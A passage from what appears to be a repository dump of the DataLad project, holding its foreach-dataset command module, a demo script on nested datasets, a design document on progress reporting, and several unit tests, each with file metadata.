SHubDownloader()\n downloader.api_url = url\n create_tree(urlpath,\n tree={\"org\": {\"repo\": ''}})\n with assert_raises(DownloadError):\n downloader.download(\"shub://org/repo\", urlpath)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_downloader_download(urlpath=None, url=None, path=None):\n path = Path(path)\n downloader = SHubDownloader()\n downloader.api_url = url\n create_tree(urlpath,\n tree={\"data\": \"foo\",\n \"org\": {\"repo\":\n '{{\"name\":\"org/repo\",\"image\":\"{}\"}}'\n .format(url + \"data\")}})\n\n target = str(path / \"target\")\n downloader.download(\"shub://org/repo\", target)\n ok_file_has_content(target, \"foo\")\n\n other_target = str(path / \"other-target\")\n downloader.download(\"shub://org/repo\", other_target)\n" }, { "alpha_fraction": 0.5500293374061584, "alphanum_fraction": 0.5510432720184326, "avg_line_length": 40.36644744873047, "blob_id": "64fd3438efef51964e073c2d5048394716d064ff", "content_id": "23418a977f4d649bb61408eed6f57e3deb5da17d", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18739, "license_type": "permissive", "max_line_length": 116, "num_lines": 453, "path": "/datalad/local/foreach_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for running a command on each (sub)dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport inspect\nimport logging\nimport os.path as op\nimport sys\nfrom typing import Union\n\nfrom argparse import REMAINDER\nfrom itertools import chain\nfrom tempfile import mkdtemp\n\nfrom datalad.cmd import NoCapture, StdOutErrCapture\nfrom datalad.core.local.run import normalize_command\n\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n contains,\n dataset_state,\n jobs_opt,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.constraints import (\n EnsureBool,\n EnsureChoice,\n EnsureNone,\n)\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom datalad.support.parallel import (\n ProducerConsumer,\n ProducerConsumerProgressLog,\n no_parentds_in_futures,\n no_subds_in_futures,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n SequenceFormatter,\n chpwd as chpwd_cm,\n getpwd,\n nothing_cm,\n shortened_repr,\n swallow_outputs,\n)\n\nlgr = logging.getLogger('datalad.local.foreach_dataset')\n\n\n_PYTHON_CMDS = {\n 'exec': exec,\n 'eval': eval\n}\n\n# Centralize definition with delayed assignment for 'auto' for each case\n_SAFE_TO_CONSUME_MAP = {\n 'auto': lambda: 1/0, # must be defined based on bottomup\"\n 'all-subds-done': no_subds_in_futures,\n 'superds-done': no_parentds_in_futures,\n 'always': None\n}\n\n@build_doc\nclass ForEachDataset(Interface):\n r\"\"\"Run a command or Python code on the dataset and/or each 
of its sub-datasets.\n\n This command provides a convenience for the cases were no dedicated DataLad command\n is provided to operate across the hierarchy of datasets. It is very similar to\n `git submodule foreach` command with the following major differences\n\n - by default (unless [CMD: --subdatasets-only CMD][PY: `subdatasets_only=True` PY]) it would\n include operation on the original dataset as well,\n - subdatasets could be traversed in bottom-up order,\n - can execute commands in parallel (see `jobs` option), but would account for the order,\n e.g. in bottom-up order command is executed in super-dataset only after it is executed\n in all subdatasets.\n\n Additional notes:\n\n - for execution of \"external\" commands we use the environment used to execute external\n git and git-annex commands.\n\n *Command format*\n\n || REFLOW >>\n [CMD: --cmd-type external CMD][PY: cmd_type='external' PY]: A few placeholders are\n supported in the command via Python format specification:\n << REFLOW ||\n\n\n - \"{pwd}\" will be replaced with the full path of the current working directory.\n - \"{ds}\" and \"{refds}\" will provide instances of the dataset currently\n operated on and the reference \"context\" dataset which was provided via ``dataset``\n argument.\n - \"{tmpdir}\" will be replaced with the full path of a temporary directory.\n \"\"\"\n _examples_ = [\n dict(text=\"Aggressively git clean all datasets, running 5 parallel jobs\",\n code_py=\"foreach_dataset(['git', 'clean', '-dfx'], recursive=True, jobs=5)\",\n code_cmd=\"datalad foreach-dataset -r -J 5 git clean -dfx\"),\n ]\n\n _params_ = dict(\n cmd=Parameter(\n args=(\"cmd\",),\n nargs=REMAINDER,\n metavar='COMMAND',\n doc=\"\"\"command for execution. [CMD: A leading '--' can be used to\n disambiguate this command from the preceding options to DataLad.\n For --cmd-type exec or eval only a single\n command argument (Python code) is supported. CMD]\n [PY: For `cmd_type='exec'` or `cmd_type='eval'` (Python code) should\n be either a string or a list with only a single item. If 'eval', the\n actual function can be passed, which will be provided all placeholders\n as keyword arguments. PY]\n \"\"\"),\n cmd_type=Parameter(\n args=(\"--cmd-type\",),\n constraints=EnsureChoice('auto', 'external', 'exec', 'eval'),\n doc=\"\"\"type of the command. `external`: to be run in a child process using dataset's runner;\n 'exec': Python source code to execute using 'exec(), no value returned;\n 'eval': Python source code to evaluate using 'eval()', return value is placed into 'result' field.\n 'auto': If used via Python API, and `cmd` is a Python function, it will use 'eval', and\n otherwise would assume 'external'.\"\"\"),\n # Following options are taken from subdatasets\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to operate on. 
If\n no dataset is given, an attempt is made to identify the dataset\n based on the input and/or the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n state=dataset_state,\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n contains=contains,\n bottomup=Parameter(\n args=(\"--bottomup\",),\n action=\"store_true\",\n doc=\"\"\"whether to report subdatasets in bottom-up order along\n each branch in the dataset tree, and not top-down.\"\"\"),\n # Possible extra options to be introduced if use-case/demand comes\n # TODO: --diff to provide `diff` record so any arbitrary git reset --hard etc desire could be fulfilled\n # TODO: --lower-recursion-limit aka --mindepth of find to replace subdatasets-only.\n # or may be recursion_limit could be made more sophisticated to be able to specify range\n subdatasets_only=Parameter(\n args=(\"-s\", \"--subdatasets-only\"),\n action=\"store_true\",\n doc=\"\"\"whether to exclude top level dataset. It is implied if a non-empty\n `contains` is used\"\"\"),\n output_streams=Parameter(\n args=(\"--output-streams\", \"--o-s\"),\n constraints=EnsureChoice('capture', 'pass-through', 'relpath'),\n doc=\"\"\"ways to handle outputs. 'capture' and return outputs from 'cmd' in the record ('stdout',\n 'stderr'); 'pass-through' to the screen (and thus absent from returned record); prefix with 'relpath'\n captured output (similar to like grep does) and write to stdout and stderr. In 'relpath', relative path\n is relative to the top of the dataset if `dataset` is specified, and if not - relative to current\n directory.\"\"\"),\n chpwd=Parameter(\n args=(\"--chpwd\",),\n constraints=EnsureChoice('ds', 'pwd'),\n doc=\"\"\"'ds' will change working directory to the top of the corresponding dataset. With 'pwd'\n no change of working directory will happen.\n Note that for Python commands, due to use of threads, we do not allow chdir=ds to be used\n with jobs > 1. Hint: use 'ds' and 'refds' objects' methods to execute commands in the context\n of those datasets.\n \"\"\"),\n safe_to_consume=Parameter(\n args=(\"--safe-to-consume\",),\n constraints=EnsureChoice(*_SAFE_TO_CONSUME_MAP),\n doc=\"\"\"Important only in the case of parallel (jobs greater than 1) execution.\n 'all-subds-done' instructs to not consider superdataset until command finished execution\n in all subdatasets (it is the value in case of 'auto' if traversal is bottomup).\n 'superds-done' instructs to not process subdatasets until command finished in the super-dataset\n (it is the value in case of 'auto' in traversal is not bottom up, which is the default). With\n 'always' there is no constraint on either to execute in sub or super dataset.\n \"\"\"),\n jobs=jobs_opt,\n )\n\n @staticmethod\n @datasetmethod(name='foreach_dataset')\n @eval_results\n def __call__(\n cmd,\n *,\n cmd_type=\"auto\",\n dataset=None,\n state='present',\n recursive=False,\n recursion_limit=None,\n contains=None,\n bottomup=False,\n subdatasets_only=False,\n output_streams='pass-through',\n chpwd='ds', # as the most common case/scenario\n safe_to_consume='auto',\n jobs=None\n ):\n if not cmd:\n raise InsufficientArgumentsError(\"No command given\")\n\n if safe_to_consume not in _SAFE_TO_CONSUME_MAP:\n raise ValueError(f\"safe_to_consume - Unknown value {safe_to_consume!r}. 
\"\n f\"Known are: {', '.join(_SAFE_TO_CONSUME_MAP)}\")\n if safe_to_consume == 'auto':\n safe_to_consume_func = no_subds_in_futures if bottomup else no_parentds_in_futures\n else:\n safe_to_consume_func = _SAFE_TO_CONSUME_MAP[safe_to_consume]\n\n if cmd_type == 'auto':\n cmd_type = 'eval' if _is_callable(cmd) else 'external'\n\n python = cmd_type in _PYTHON_CMDS\n\n if python:\n if _is_callable(cmd):\n if cmd_type != 'eval':\n raise ValueError(f\"Can invoke provided function only in 'eval' mode. {cmd_type!r} was provided\")\n else:\n # yoh decided to avoid unnecessary complication/inhomogeneity with support\n # of multiple Python commands for now; and also allow for a single string command\n # in Python interface\n if isinstance(cmd, (list, tuple)):\n if len(cmd) > 1:\n raise ValueError(f\"Please provide a single Python expression. Got {len(cmd)}: {cmd!r}\")\n cmd = cmd[0]\n\n if not isinstance(cmd, str):\n raise ValueError(f\"Please provide a single Python expression or a function. Got {cmd!r}\")\n else:\n if _is_callable(cmd):\n raise ValueError(f\"cmd_type={cmd_type} but a function {cmd} was provided\")\n protocol = NoCapture if output_streams == 'pass-through' else StdOutErrCapture\n\n refds = require_dataset(\n dataset, check_installed=True, purpose='foreach-dataset execution')\n pwd = getpwd() # Note: 'run' has some more elaborate logic for this\n\n #\n # Producer -- datasets to act on\n #\n subdatasets_it = refds.subdatasets(\n state=state,\n recursive=recursive, recursion_limit=recursion_limit,\n contains=contains,\n bottomup=bottomup,\n result_xfm='paths',\n result_renderer='disabled',\n return_type='generator',\n )\n\n if subdatasets_only or contains:\n datasets_it = subdatasets_it\n else:\n if bottomup:\n datasets_it = chain(subdatasets_it, [refds.path])\n else:\n datasets_it = chain([refds.path], subdatasets_it)\n\n #\n # Consumer - one for all cmd_type's\n #\n def run_cmd(dspath):\n ds = Dataset(dspath)\n status_rec = get_status_dict(\n 'foreach-dataset',\n ds=ds,\n path=ds.path,\n command=cmd\n )\n if not ds.is_installed():\n yield dict(\n status_rec,\n status=\"impossible\",\n message=\"not installed\"\n )\n return\n # For consistent environment (Python) and formatting (command) similar to `run` one\n # But for Python command we provide actual ds and refds not paths\n placeholders = dict(\n pwd=pwd,\n # pass actual instances so .format could access attributes even for external commands\n ds=ds, # if python else ds.path,\n dspath=ds.path, # just for consistency with `run`\n refds=refds, # if python else refds.path,\n # Check if the command contains \"tmpdir\" to avoid creating an\n # unnecessary temporary directory in most but not all cases.\n # Note: different from 'run' - not wrapping match within {} and doing str\n tmpdir=mkdtemp(prefix=\"datalad-run-\") if \"tmpdir\" in str(cmd) else \"\")\n try:\n if python:\n if isinstance(cmd, str):\n cmd_f, cmd_a, cmd_kw = _PYTHON_CMDS[cmd_type], (cmd, placeholders), {}\n else:\n assert _is_callable(cmd)\n # all placeholders are passed as kwargs to the function\n cmd_f, cmd_a, cmd_kw = cmd, [], placeholders\n\n cm = chpwd_cm(ds.path) if chpwd == 'ds' else nothing_cm()\n with cm:\n if output_streams == 'pass-through':\n res = cmd_f(*cmd_a, **cmd_kw)\n out = {}\n elif output_streams in ('capture', 'relpath'):\n with swallow_outputs() as cmo:\n res = cmd_f(*cmd_a, **cmd_kw)\n out = {\n 'stdout': cmo.out,\n 'stderr': cmo.err,\n }\n else:\n raise RuntimeError(output_streams)\n if cmd_type == 'eval':\n status_rec['result'] = res\n else:\n 
assert res is None\n else:\n try:\n cmd_expanded = format_command(cmd, **placeholders)\n except KeyError as exc:\n yield dict(\n status_rec,\n status='impossible',\n message=('command has an unrecognized placeholder: %s', exc))\n return\n out = ds.repo._git_runner.run(\n cmd_expanded,\n cwd=ds.path if chpwd == 'ds' else pwd,\n protocol=protocol)\n if output_streams in ('capture', 'relpath'):\n status_rec.update(out)\n # provide some feedback to user in default rendering\n if any(out.values()):\n status_rec['message'] = shortened_repr(out, 100)\n status_rec['status'] = 'ok'\n yield status_rec\n except Exception as exc:\n # get a better version with exception handling redoing the whole\n # status dict from scratch\n yield get_status_dict(\n 'foreach-dataset',\n ds=ds,\n path=ds.path,\n command=cmd,\n exception=exc,\n status='error',\n message=str(exc)\n )\n\n if output_streams == 'pass-through':\n pc_class = ProducerConsumer\n pc_kw = {}\n else:\n pc_class = ProducerConsumerProgressLog\n pc_kw = dict(lgr=lgr, label=\"foreach-dataset\", unit=\"datasets\")\n\n if python:\n effective_jobs = pc_class.get_effective_jobs(jobs)\n if effective_jobs > 1:\n warning = \"\"\n if chpwd == 'ds':\n warning += \\\n \"Execution of Python commands in parallel threads while changing directory \" \\\n \"is not thread-safe. \"\n if output_streams in ('capture', 'relpath'):\n warning += \\\n \"Execution of Python commands in parallel while capturing output is not possible.\"\n if warning:\n lgr.warning(\"Got jobs=%d. %s We will execute without parallelization\", jobs, warning)\n jobs = 0 # no threading even between producer/consumer\n\n yield from pc_class(\n producer=datasets_it,\n consumer=run_cmd,\n # probably not needed\n # It is ok to start with subdatasets since top dataset already exists\n safe_to_consume=safe_to_consume_func,\n # or vice versa\n jobs=jobs,\n **pc_kw\n )\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n from datalad.interface.utils import generic_result_renderer\n if kwargs.get('output_streams') == 'relpath':\n from datalad.log import no_progress\n with no_progress():\n ds: Union[str, Dataset] = kwargs.get('dataset')\n if ds:\n if not isinstance(ds, Dataset):\n ds = Dataset(ds) # so all ///, ^ etc get treated\n refpath = ds.path\n else:\n refpath = getpwd()\n for k in ('stdout', 'stderr'):\n v = res.get(k)\n if v:\n path = res.get('path')\n relpath = op.relpath(path, refpath) if path else ''\n if relpath == op.curdir:\n relpath = ''\n if relpath and not relpath.endswith(op.sep):\n relpath += op.sep\n out = getattr(sys, k)\n for l in v.splitlines():\n out.write(f\"{relpath}{l}\\n\")\n else:\n generic_result_renderer(res)\n\n# Reduced version from run\ndef format_command(command, **kwds):\n \"\"\"Plug in placeholders in `command`.\n\n Parameters\n ----------\n dset : Dataset\n command : str or list\n\n `kwds` is passed to the `format` call.\n\n Returns\n -------\n formatted command (str)\n \"\"\"\n command = normalize_command(command)\n sfmt = SequenceFormatter()\n return sfmt.format(command, **kwds)\n\n\ndef _is_callable(f):\n return inspect.isfunction(f) or inspect.isbuiltin(f)\n" }, { "alpha_fraction": 0.76932293176651, "alphanum_fraction": 0.776512861251831, "avg_line_length": 37.8139533996582, "blob_id": "f59356e737a8434cca3f920c26e2831b823c9df3", "content_id": "0849c6dbfa4b650df1fd8301be1086e0e6856371", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1669, "license_type": "permissive", 
"max_line_length": 144, "num_lines": 43, "path": "/docs/casts/seamless_nested_repos.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"DataLad makes a tree of nested Git repositories feel like a big monorepo...\"\n\nsay \"Let's create a root dataset\"\nrun \"datalad create demo\"\nrun \"cd demo\"\nsay \"Any DataLad dataset is just a Git repo with some initial configuration\"\nrun \"git log --oneline\"\n\nsay \"We can nest datasets, by telling DataLad to register a new dataset in a parent dataset\"\nrun \"datalad create -d . sub1\"\nsay \"A subdataset is a regular Git submodule\"\nrun \"git submodule\"\n\nsay \"Datasets can be nested arbitrarily deep\"\nrun \"datalad create -d . sub1/justadir/sub2\"\n\nsay \"Unlike Git, DataLad automatically takes care of committing all changes associated with the added subdataset up to the given parent dataset\"\nrun \"datalad status\"\n\nsay \"Let's create some content in the deepest subdataset\"\nrun \"mkdir sub1/justadir/sub2/anotherdir\"\nrun \"touch sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"Git only reports changes within a repository, in the case the whole subdataset\"\nrun \"git status\"\n\nsay \"DataLad considers the entire tree\"\nrun \"datalad status -r\"\n\nsay \"Like Git, it can report individual untracked files, but also across repository boundaries\"\nrun \"datalad status -r --untracked all\"\n\nsay \"Adding this new content with Git or git-annex would be an exercise\"\nrun_expfail \"git add sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"Again, DataLad does not require users to determine the correct repository\"\nrun \"datalad save -d . sub1/justadir/sub2/anotherdir/afile\"\n\nsay \"All associated changes in the entire dataset tree were committed\"\nrun \"datalad status\"\n\nsay \"DataLad's 'diff' is able to report the changes from these related commits throughout the repository tree\"\nrun \"datalad diff -r -f @~1\"\n" }, { "alpha_fraction": 0.7143410444259644, "alphanum_fraction": 0.7155027985572815, "avg_line_length": 36.97549057006836, "blob_id": "12833308bacbbc1f13e555cd0f51d8b5ccdd11b8", "content_id": "412c6227fe08e3cdd8f45fc6bde450139ff59a6a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7747, "license_type": "permissive", "max_line_length": 84, "num_lines": 204, "path": "/docs/source/design/progress_reporting.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_progress_reporting:\n\n******************\nProgress reporting\n******************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\n\nProgress reporting is implemented via the logging system. A dedicated function\n:py:func:`datalad.log.log_progress` represents the main API for progress\nreporting. For some standard use cases, the utilities\n:py:func:`datalad.log.with_progress` and\n:py:func:`datalad.log.with_result_progress` can simplify result reporting\nfurther.\n\n\nDesign and implementation\n=========================\n\nThis basic idea is to use an instance of datalad's loggers to emit log messages\nwith particular attributes that are picked up by\n:py:class:`datalad.log.ProgressHandler` (derived from\n:py:class:`logging.Handler`), and are acted on differently, depending on\nconfiguration and conditions of a session (e.g., interactive terminal sessions\nvs. non-interactive usage in scripts). 
This variable behavior is implemented\nvia the use of :py:mod:`logging` standard library log filters and handlers.\nRoughly speaking, :py:class:`datalad.log.ProgressHandler` will only be used for\ninteractive sessions. In non-interactive cases, progress log messages are\ninspected by :py:func:`datalad.log.filter_noninteractive_progress`, and are\neither discarded or treated like any other log message (see\n:py:meth:`datalad.log.LoggerHelper.get_initialized_logger` for details on the\nhandler and filter setup).\n\n:py:class:`datalad.log.ProgressHandler` inspects incoming log records for\nattributes with names starting with `dlm_progress`. It will only process such\nrecords and pass others on to the underlying original log handler otherwise.\n\n:py:class:`datalad.log.ProgressHandler` takes care of creating, updating and\ndestroying any number of simultaneously running progress bars. Progress reports\nmust identify the respective process via an arbitrary string ID. It is the\ncaller's responsibility to ensure that this ID is unique to the target\nprocess/activity.\n\n\nReporting progress with `log_progress()`\n========================================\n\nTypical progress reporting via :py:func:`datalad.log.log_progress` involves\nthree types of calls.\n\n1. Start reporting progress about a process\n-------------------------------------------\n\nA typical call to start of progress reporting looks like this\n\n.. code-block:: python\n\n log_progress(\n # the callable used to emit log messages\n lgr.info,\n # a unique identifiers of the activity progress is reported for\n identifier,\n # main message\n 'Unlocking files',\n # optional unit string for a progress bar\n unit=' Files',\n # optional label to be displayed in a progress bar\n label='Unlocking',\n # maximum value for a progress bar\n total=nfiles,\n )\n\nA new progress bar will be created automatically for any report with a previously\nunseen activity ``identifier``. It can be configured via the specification of\na number of arguments, most notably a target ``total`` for the progress bar.\nSee :py:func:`datalad.log.log_progress` for a complete overview.\n\nStarting a progress report must be done with a dedicated call. It cannot be combined\nwith a progress update.\n\n\n2. Update progress information about a process\n----------------------------------------------\n\nAny subsequent call to :py:func:`datalad.log.log_progress` with an activity\nidentifier that has already been seen either updates, or finishes the progress\nreporting for an activity. Updates must contain an ``update`` key which either\nspecifies a new value (if `increment=False`, the default) or an increment to\npreviously known value (if `increment=True`):\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n # must match the identier used to start the progress reporting\n identifier,\n # arbitrary message content, string expansion supported just like\n # regular log messages\n \"Files to unlock %i\", nfiles,\n # critical key for report updates\n update=1,\n # ``update`` could be an absolute value or an increment\n increment=True\n )\n\nUpdating a progress report can only be done after a progress reporting was\ninitialized (see above).\n\n\n3. Report completion of a process\n---------------------------------\n\nA progress bar will remain active until it is explicitly taken down, even if an\ninitially declared ``total`` value may have been reached. 
Finishing a progress\nreport requires a final log message with the corresponding identifiers which,\nlike the first initializing message, does NOT contain an ``update`` key.\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n identifier,\n # closing log message\n \"Completed unlocking files\",\n )\n\n\nProgress reporting in non-interactive sessions\n----------------------------------------------\n\n:py:func:`datalad.log.log_progress` takes a `noninteractive_level` argument\nthat can be used to specify a log level at which progress is logged when no\nprogress bars can be used, but actual log messages are produced.\n\n.. code-block:: python\n\n import logging\n\n log_progress(\n lgr.info,\n identifier,\n \"Completed unlocking files\",\n noninteractive_level=logging.INFO\n )\n\nEach call to :py:func:`~datalad.log.log_progress` can be given a different\nlog level, in order to control the verbosity of the reporting in such a scenario.\nFor example, it is possible to log the start or end of an activity at a higher\nlevel than intermediate updates. It is also possible to single out particular\nintermediate events, and report them at a higher level.\n\nIf no `noninteractive_level` is specified, the progress update is unconditionally\nlogged at the level implied by the given logger callable. \n\n\nReporting progress with `with_(result_)progress()`\n==================================================\n\nFor cases were a list of items needs to be processes sequentially, and progress\nshall be communicated, two additional helpers could be used: the decorators\n:py:func:`datalad.log.with_progress` and\n:py:func:`datalad.log.with_result_progress`. They require a callable that takes\na list (or more generally a sequence) of items to be processed as the first\npositional argument. They both set up and perform all necessary calls to\n:py:func:`~datalad.log.log_progress`.\n\nThe difference between these helpers is that\n:py:func:`datalad.log.with_result_progress` expects a callable to produce\nDataLad result records, and supports customs filters to decide which particular\nresult records to consider for progress reporting (e.g., only records for a\nparticular `action` and `type`).\n\n\nOutput non-progress information without interfering with progress bars\n======================================================================\n\n:py:func:`~datalad.log.log_progress` can also be useful when not reporting\nprogress, but ensuring that no other output is interfering with progress bars,\nand vice versa. The argument `maint` can be used in this case, with no\nparticular activity identifier (it always impacts all active progress bars):\n\n\n.. code-block:: python\n\n log_progress(\n lgr.info,\n None,\n 'Clear progress bars',\n maint='clear',\n )\n\n\nThis call will trigger a temporary discontinuation of any progress bar display.\nProgress bars can either be re-enabled all at once, by an analog message with\n``maint='refresh'``, or will re-show themselves automatically when the next\nupdate is received. 
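For symmetry, a minimal sketch of the corresponding re-enable call (only the
message and the ``maint`` value differ from the example above):

.. code-block:: python

    log_progress(
        lgr.info,
        None,
        'Re-enable progress bars',
        maint='refresh',
    )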
A :py:func:`~datalad.log.no_progress` context manager helper\ncan be used to surround your context with those two calls to prevent progress\nbars from interfering.\n" }, { "alpha_fraction": 0.6125584244728088, "alphanum_fraction": 0.6359385251998901, "avg_line_length": 41.771427154541016, "blob_id": "d9917beac18bb872bcb24ebcdf7298b3069776c9", "content_id": "31e53f819964347673bbfca0775957424d39e391", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1497, "license_type": "permissive", "max_line_length": 87, "num_lines": 35, "path": "/datalad/support/tests/test_status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_not_equal,\n)\n\nfrom ..status import FileStatus\n\n\ndef test_FileStatus_basic():\n assert_equal(FileStatus(size=0), FileStatus(size=0))\n assert_not_equal(FileStatus(size=0), FileStatus(size=1))\n # mtimes allow trimming if one is int\n assert_equal(FileStatus(mtime=0), FileStatus(mtime=0.9999))\n assert_equal(FileStatus(mtime=0), FileStatus(mtime=0.0001))\n assert_not_equal(FileStatus(mtime=0.2), FileStatus(mtime=0.1))\n assert_not_equal(FileStatus(mtime=0.2), FileStatus(mtime=None))\n assert_not_equal(FileStatus(mtime=1), FileStatus(mtime=None))\n # And with None should be False\n assert_not_equal(FileStatus(mtime=1), None)\n assert_not_equal(None, FileStatus(mtime=1))\n # adding more information would result in not-equal\n assert_not_equal(FileStatus(size=0), FileStatus(size=0, mtime=123))\n # empty ones can't be compared\n # TODO: actually not clear why that NotImplemented singleton is not returned\n assert_not_equal(FileStatus(), FileStatus())\n #assert_false(FileStatus() != FileStatus())\n" }, { "alpha_fraction": 0.542140781879425, "alphanum_fraction": 0.5561943650245667, "avg_line_length": 37.415645599365234, "blob_id": "1ec4260f07e55ad537e8b6fc1ffe10b23c435f8f", "content_id": "8a7b92e0f8c3bf11d173ec8b0ef9271980183aba", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25047, "license_type": "permissive", "max_line_length": 116, "num_lines": 652, "path": "/datalad/local/tests/test_add_archive_content.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for add-archive-content command\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport tempfile\nfrom glob import glob\nfrom os import unlink\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n pardir,\n)\nfrom pathlib import Path\n\nfrom datalad.api import 
(\n Dataset,\n add_archive_content,\n clean,\n)\nfrom datalad.consts import (\n ARCHIVES_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n NoDatasetFound,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_values_cond,\n assert_true,\n create_tree,\n eq_,\n integration,\n known_failure_windows,\n ok_,\n ok_archives_caches,\n ok_file_has_content,\n ok_file_under_git,\n serve_path_via_http,\n skip_if,\n skip_if_adjusted_branch,\n swallow_outputs,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n chpwd,\n find_files,\n get_tempfile_kwargs,\n getpwd,\n on_windows,\n rmtemp,\n)\n\ntreeargs = dict(\n tree=(\n ('1.tar.gz', (\n ('crcns_pfc-1_data', (('CR24A', (\n ('behaving1', {'1 f.txt': '1 f load'}),)),)),\n ('crcns_pfc-1_data', (('CR24C', (\n ('behaving3', {'3 f.txt': '3 f load'}),)),)),\n ('crcns_pfc-1_data', (('CR24D', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)),\n ('__MACOSX', (('crcns_pfc-2_data', (\n ('CR24B', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)\n ),)),\n ('crcns_pfc-2_data', (('__MACOSX', (\n ('CR24E', (\n ('behaving2', {'2 f.txt': '2 f load'}),)),)\n ),)),\n\n )),\n )\n)\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**treeargs)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_dirs(path_orig=None, url=None, repo_path=None):\n # change to repo_path\n with chpwd(repo_path):\n # create annex repo\n ds = Dataset(repo_path).create(force=True)\n repo = ds.repo\n # add archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n repo.commit(\"added 1.tar.gz\")\n\n # test with excludes and annex options\n add_archive_content('1.tar.gz',\n existing='archive-suffix',\n # Since inconsistent and seems in many cases no\n # leading dirs to strip, keep them as provided\n strip_leading_dirs=True,\n delete=True,\n leading_dirs_consider=['crcns.*', '1'],\n leading_dirs_depth=2,\n use_current_dir=False,\n exclude='.*__MACOSX.*') # some junk penetrates\n\n eq_(repo.get_description(\n uuid=DATALAD_SPECIAL_REMOTES_UUIDS[ARCHIVES_SPECIAL_REMOTE]),\n '[%s]' % ARCHIVES_SPECIAL_REMOTE)\n\n all_files = sorted(find_files('.'))\n # posixify paths to make it work on Windows as well\n all_files = [Path(file).as_posix() for file in all_files]\n target_files = {\n 'CR24A/behaving1/1 f.txt',\n 'CR24C/behaving3/3 f.txt',\n 'CR24D/behaving2/2 f.txt',\n '.datalad/config',\n }\n eq_(set(all_files), target_files)\n\n # regression test: the subdir in MACOSX wasn't excluded and its name was\n # getting stripped by leading_dir_len\n # if stripping and exclude didn't work this fails\n assert_false(exists('__MACOSX'))\n # if exclude doesn't work then name of subdir gets stripped by\n # leading_dir_len\n assert_false(exists('c-1_data'))\n # if exclude doesn't work but everything else works this fails\n assert_false(exists('CR24B'))\n\n# within top directory\n# archive is in subdirectory -- adding in the same (or different) directory\n\ntree1args = dict(\n tree=(\n ('1.tar.gz', (\n ('1 f.txt', '1 f load'),\n ('d', (('1d', ''),)), )),\n ('1u', {\n '1.tar.gz': { # updated file content\n '1 